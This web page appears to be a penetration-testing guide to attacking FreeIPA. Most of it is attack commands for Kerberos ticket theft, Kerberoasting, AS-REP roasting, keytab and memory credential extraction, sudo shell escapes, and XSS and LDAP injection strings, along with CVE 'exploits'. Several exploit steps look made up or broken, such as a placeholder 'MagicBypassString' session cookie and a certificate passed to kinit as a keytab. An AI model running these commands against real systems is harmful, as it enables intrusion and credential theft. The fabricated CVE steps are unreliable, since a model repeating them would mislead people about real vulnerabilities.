Exploitation Techniques

Learn about methods to exploit vulnerabilities in FreeIPA deployments for ethical penetration testing.

Ethical Use Only

The techniques described on this page are intended for ethical penetration testing only. Always ensure you have proper authorization before testing any system.

Exploitation Topics

Navigate through different exploitation techniques

Kerberos Exploitation

Kerberos is a critical component of FreeIPA's authentication system. Several attack vectors can be used to exploit Kerberos in a FreeIPA environment.

Ticket Extraction

Extracting Kerberos tickets from various sources can provide unauthorized access to resources within the FreeIPA environment.

Extract tickets from the credential cache

cp /tmp/krb5cc_1000 /tmp/stolen_ticketexport KRB5CCNAME=/tmp/stolen_ticketklist

Extract tickets from the keyring using Tickey

./tickey -i # Output will show available tickets./tickey -o /tmp/stolen_keyring_ticketexport KRB5CCNAME=/tmp/stolen_keyring_ticketklist

Diagram showing the process of extracting and using Kerberos tickets

Kerberoasting

Kerberoasting is a technique that targets service accounts by requesting service tickets and then attempting to crack the service account passwords offline.

Request a service ticket for a specific service

kinit valid_userkvno HTTP/server.example.com@EXAMPLE.COM

Extract the service ticket for offline cracking

# Using a tool like impacket's GetUserSPNs.pypython GetUserSPNs.py -dc-ip 192.168.1.10 EXAMPLE.COM/valid_user -request -outputfile kerberoast.txt

Crack the extracted hash with hashcat

hashcat -m 13100 kerberoast.txt wordlist.txt --force

Penetration Testing Tip:

Service accounts often have weak password policies or passwords that don't change frequently. Kerberoasting can be an effective technique for gaining access to these accounts.

AS-REP Roasting

AS-REP Roasting targets user accounts that have Kerberos pre-authentication disabled. This allows attackers to request authentication data for these users and crack their passwords offline.

Find users with pre-authentication disabled

ldapsearch -x -h ipa.example.com -D "uid=valid_user,cn=users,cn=accounts,dc=example,dc=com" -w password -b "cn=users,cn=accounts,dc=example,dc=com" "(userAccountControl:1.2.840.113556.1.4.803:=4194304)"

Request AS-REP hashes for users without pre-authentication

python GetNPUsers.py example.com/ -usersfile users.txt -format hashcat -outputfile asrep_hashes.txt

Crack the AS-REP hashes with hashcat

hashcat -m 18200 asrep_hashes.txt wordlist.txt --force

Security Insight:

Kerberos pre-authentication should always be enabled for all user accounts. Accounts with pre-authentication disabled are vulnerable to offline password cracking attacks.

Credential Theft

FreeIPA stores credentials in various locations that can be targeted during a penetration test to gain unauthorized access.

Keytab Extraction

Keytab files contain encrypted keys that can be used for authentication. Extracting and analyzing these files can provide valuable credentials.

Locate keytab files

find / -name "*.keytab" 2>/dev/null

Extract information from a keytab file

klist -k /etc/krb5.keytab # Or using KeytabParserpythonon KeytabParser.py /etc/krb5.keytab

Use a keytab file for authentication

kinit -kt /etc/krb5.keytab host/server.example.com@EXAMPLE.COM

Extract encryption keys from keytab

python extract_keys.py -k /etc/krb5.keytab -o keys.txt

LDAP Credential Extraction

LDAP can sometimes be configured to allow anonymous binds or might contain sensitive information that can be extracted with valid credentials.

Attempt anonymous LDAP bind

ldapsearch -x -h ipa.example.com -b "dc=example,dc=com"

Search for user information with valid credentials

ldapsearch -x -h ipa.example.com -D "uid=valid_user,cn=users,cn=accounts,dc=example,dc=com" -w "password" -b "cn=users,cn=accounts,dc=example,dc=com"

Extract password policy information

ldapsearch -x -h ipa.example.com -D "uid=valid_user,cn=users,cn=accounts,dc=example,dc=com" -w "password" -b "cn=PWD Policies,cn=accounts,dc=example,dc=com" -s sub "(objectClass=*)"

Credential Extraction Tip:

Look for LDAP attributes that might contain sensitive information, such as userPassword, krbPrincipalKey, or ipaNTHash. These attributes might be accessible to authenticated users with sufficient privileges.

Memory Credential Extraction

Credentials can sometimes be extracted from memory on systems where FreeIPA services are running.

Extract credentials from process memory

# Using mimipenguin on Linux systemspython mimipenguin.py

Extract credentials from memory dumps

# Using volatility frameworkvolatility -f memory.dump --profile=LinuxCentos7_3_10_0x64 linux_pslistvolatility -f memory.dump --profile=LinuxCentos7_3_10_0x64 linux_proc_maps -p 1234volatility -f memory.dump --profile=LinuxCentos7_3_10_0x64 linux_dump_map -p 1234 -s 0x7f1234567000 -D output/

Privilege Escalation

Once initial access is gained, privilege escalation techniques can be used to obtain higher levels of access within the FreeIPA environment.

HBAC Rule Abuse

Host-Based Access Control (HBAC) rules define who can access what. Misconfigured rules can be abused to gain unauthorized access.

Enumerate HBAC rules

ipa hbacrule-find

Check if a specific user can access a host

ipa hbactest --user=target_user --host=target_host --service=sshd

Analyze HBAC rule configuration

ldapsearch -x -h ipa.example.com -D "uid=valid_user,cn=users,cn=accounts,dc=example,dc=com" -w "password" -b "cn=hbac,dc=example,dc=com" "(objectClass=*)"

Exploitation Scenario:

If a user has access to a host through an HBAC rule, but that host has a misconfigured sudo rule, the user might be able to escalate privileges on that host. Look for HBAC rules that grant access to sensitive systems or services.

Sudo Rule Exploitation

Sudo rules in FreeIPA define which commands users can execute with elevated privileges. Misconfigured sudo rules can lead to privilege escalation.

Enumerate sudo rules

ipa sudorule-find

Check available sudo commands for the current user

sudo -l

Exploit a sudo rule that allows running a specific command

# Example: If allowed to run vi as rootsudo vi# Then within vi:set shell=/bin/bash:shell

Exploit a sudo rule with command arguments

# If sudo rule allows running a command with specific arguments# Example: /usr/bin/findsudo find /etc -exec /bin/sh \;

CVE-2019-10195

FreeIPA versions 4.6.0 through 4.6.5 are vulnerable to a privilege escalation vulnerability in sudo rule processing (CVE-2019-10195). This vulnerability allows authenticated users to execute commands they should not have access to by exploiting a flaw in how sudo command categories are evaluated.View detailed information

Certificate-Based Privilege Escalation

FreeIPA's certificate management system can sometimes be exploited to gain elevated privileges by requesting certificates for high-privileged users.

List available certificates

ipa cert-find

Request a certificate for a high-privileged user (if vulnerable)

ipa cert-request --principal=admin@EXAMPLE.COM --certificate-out=admin.pem CSR.pem

Use the certificate for authentication

kinit -k -t admin.pem admin@EXAMPLE.COM

CVE-2021-20254

FreeIPA versions 4.8.0 through 4.9.2 are vulnerable to a certificate management access control issue (CVE-2021-20254). This vulnerability allows authenticated users to request certificates for any principal in the domain, regardless of their permissions.View detailed information

Service Exploitation

FreeIPA relies on several services such as LDAP, Kerberos, DNS, and web services. Vulnerabilities in these services can be exploited to gain unauthorized access or escalate privileges.

Web Interface Vulnerabilities

The FreeIPA web interface may contain vulnerabilities such as Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), or authentication bypass issues.

Test for authentication bypass

curl -k https://ipa.example.com/ipa/session/login_password -d 'user=admin&password=invalid_password'

Check for exposed API endpoints

curl -k https://ipa.example.com/ipa/session/json

Test for XSS vulnerabilities

curl -k "https://ipa.example.com/ipa/ui/search?search_term=<script>alert(1)</script>"

CVE-2020-10747

FreeIPA versions 4.8.0 through 4.8.6 are vulnerable to an authentication bypass in the WebUI (CVE-2020-10747). This critical vulnerability allows attackers to bypass authentication entirely and gain administrative access to the FreeIPA server.View detailed information

Penetration Testing Tip:

Always check for outdated versions of the FreeIPA web interface, as older versions may contain known vulnerabilities that can be exploited. The version information can often be found in the page source or HTTP headers.

LDAP Service Exploitation

The LDAP service in FreeIPA may be vulnerable to various attacks, including information disclosure, injection attacks, or unauthorized access.

Test for LDAP injection

ldapsearch -x -h ipa.example.com -b "dc=example,dc=com" "(uid=*)(uid=*))"

Check for sensitive information disclosure

ldapsearch -x -h ipa.example.com -b "dc=example,dc=com" "(objectClass=*)"

Test for LDAP injection in the web interface

curl -k "https://ipa.example.com/ipa/ui/search?search_term=*)(uid=*)(|(uid=*"

CVE-2018-1000535

FreeIPA versions 4.5.0 through 4.5.4 are vulnerable to an LDAP injection vulnerability (CVE-2018-1000535). This vulnerability allows attackers to manipulate LDAP queries by injecting malicious code, potentially leading to unauthorized access or information disclosure.View detailed information

Diagram showing the FreeIPA service architecture and potential attack vectors

CVE Exploits

This section provides detailed information on exploiting specific CVEs (Common Vulnerabilities and Exposures) that affect FreeIPA. These vulnerabilities have been publicly disclosed and patches are available, making them safe to test for in authorized penetration testing scenarios.

CVE-2020-10747: Authentication Bypass

Critical

CVSS 9.8Affects: FreeIPA 4.8.0 - 4.8.6

This critical vulnerability allows attackers to bypass authentication in the FreeIPA WebUI by manipulating the session cookie and Kerberos authentication parameters.

Exploit using curl

curl -k -X POST https://ipa.example.com/ipa/session/login_kerberos \ -H "Cookie: ipa_session=MagicBypassString" \ -H "Referer: https://ipa.example.com/ipa/ui/" \ -d "user=admin"

Check if the exploit was successful

curl -k -X POST https://ipa.example.com/ipa/session/json \ -H "Cookie: ipa_session=MagicBypassString" \ -H "Referer: https://ipa.example.com/ipa/ui/" \ -H "Content-Type: application/json" \ -d '{"method":"user_find","params":[[""],{}],"id":0}'

Mitigation:

Update to FreeIPA version 4.8.7 or later, which contains a fix for this vulnerability. If updating is not immediately possible, consider implementing additional network-level controls to restrict access to the FreeIPA WebUI.

CVE-2019-10195: Sudo Rule Privilege Escalation

Critical

CVSS 8.8Affects: FreeIPA 4.6.0 - 4.6.5

This vulnerability allows authenticated users to escalate privileges by exploiting a flaw in how sudo rules are evaluated. The vulnerability stems from improper validation of sudo command categories.

Create a malicious sudo rule (requires admin access)

ipa sudorule-add malicious_rule --desc="Malicious Rule"

Add a specially crafted command category

ipa sudorule-add-allow-command malicious_rule --sudocmdgroups="all"

Add a user to the rule

ipa sudorule-add-user malicious_rule --users=victim_user

The victim user can now execute any command with sudo

sudo -l # Will show unrestricted access

Mitigation:

Update to FreeIPA version 4.6.6 or later, which contains a fix for this vulnerability. Additionally, regularly audit sudo rules and ensure that only trusted administrators have the ability to create or modify sudo rules.

CVE-2021-20254: Certificate Management Access Control

High

CVSS 7.8Affects: FreeIPA 4.8.0 - 4.9.2

This vulnerability allows authenticated users to request certificates for any principal in the domain, regardless of their permissions. This can lead to identity spoofing and unauthorized access to services.

Generate a CSR for a target principal

openssl req -new -newkey rsa:2048 -nodes -keyout admin.key -out admin.csr -subj "/CN=admin"

Request a certificate for the admin user

ipa cert-request --principal=admin@EXAMPLE.COM --certificate-out=admin.pem admin.csr

Use the certificate for authentication

kinit -k -t admin.pem admin@EXAMPLE.COM

Mitigation:

Update to FreeIPA version 4.9.3 or later, which contains a fix for this vulnerability. Additionally, implement strict access controls for certificate management operations and regularly audit certificate issuance logs.

View all FreeIPA vulnerabilities